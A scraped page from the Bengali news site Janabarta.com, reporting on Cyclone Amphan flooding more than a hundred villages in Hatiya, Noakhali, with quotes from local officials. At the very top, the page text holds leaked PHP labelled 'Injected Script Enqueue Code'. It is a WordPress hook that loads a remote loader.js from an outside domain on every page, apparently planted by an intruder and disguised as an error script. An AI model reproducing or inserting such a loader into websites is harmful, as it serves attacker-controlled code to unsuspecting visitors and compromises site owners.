// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site পানির নিচে শতাধিক গ্রাম, আশ্রয়হীন হাতিয়ার লক্ষাধিক মানুষ - Janabarta.com

পানির নিচে শতাধিক গ্রাম, আশ্রয়হীন হাতিয়ার লক্ষাধিক মানুষ

নিজস্ব প্রতিবেদকঃ নোয়াখালীর দ্বীপাঞ্চল হাতিয়া উপজেলায় ঘূর্ণিঝড় আম্পানের প্রভাবে বেড়িবাঁধ ভেঙ্গে জোয়ারের পানিতে শতাধিক গ্রাম প্লাবিত হয়েছে। তলিয়ে গেছে ফসলি মাঠ। উপজেলার সোনাদিয়া ইউনিয়নের আধা কিলোমিটার, নলচিরা ইউনিয়নের এক কিলোমিটার, চরকিং ইউনিয়নের আধা কিলোমিটার এলাকা পানিতে তলিয়ে গেছে।

তমরুদ্দি ইউনিয়নের ভাঙ্গা বাঁধটি সংস্কার না করায় ঘূর্ণিঝড়ে সৃষ্ট জোয়ারের পানিতে বুধবার রাতে শতাধিক এলাকা প্লাবিত হয়। এসব এলাকায় লক্ষাধিক মানুষ পানিবন্দি অবস্থায় চরম দূর্ভোগে রয়েছেন।

সোনাদিয়া ইউনিয়নের চেয়ারম্যান মো: নুরুল ইসলাম বলেন, হৈক বাজার এলাকায় বেড়িবাঁধ ভেঙে প্রায় শতাধিক মাছের ঘের এবং ফসলি জমির ব্যাপক ক্ষয়ক্ষতি হয়েছে।

এ বিষয়ে হাতিয়া উপজেলা নির্বাহী কর্মকর্তা রেজাউল করিম বলেন, ঘূর্ণিঝড় আম্পানের প্রভাবে নদীর পানি ৪ থেকে ৫ ফুট পর্যন্ত বৃদ্ধি পেয়েছে।

বেড়িবাঁধগুলো সংস্কার না করার কারণে পরবর্তীতেও ব্যাপক ক্ষয়ক্ষতির আশঙ্কা করছেন স্থানীয় এলাকাবাসী।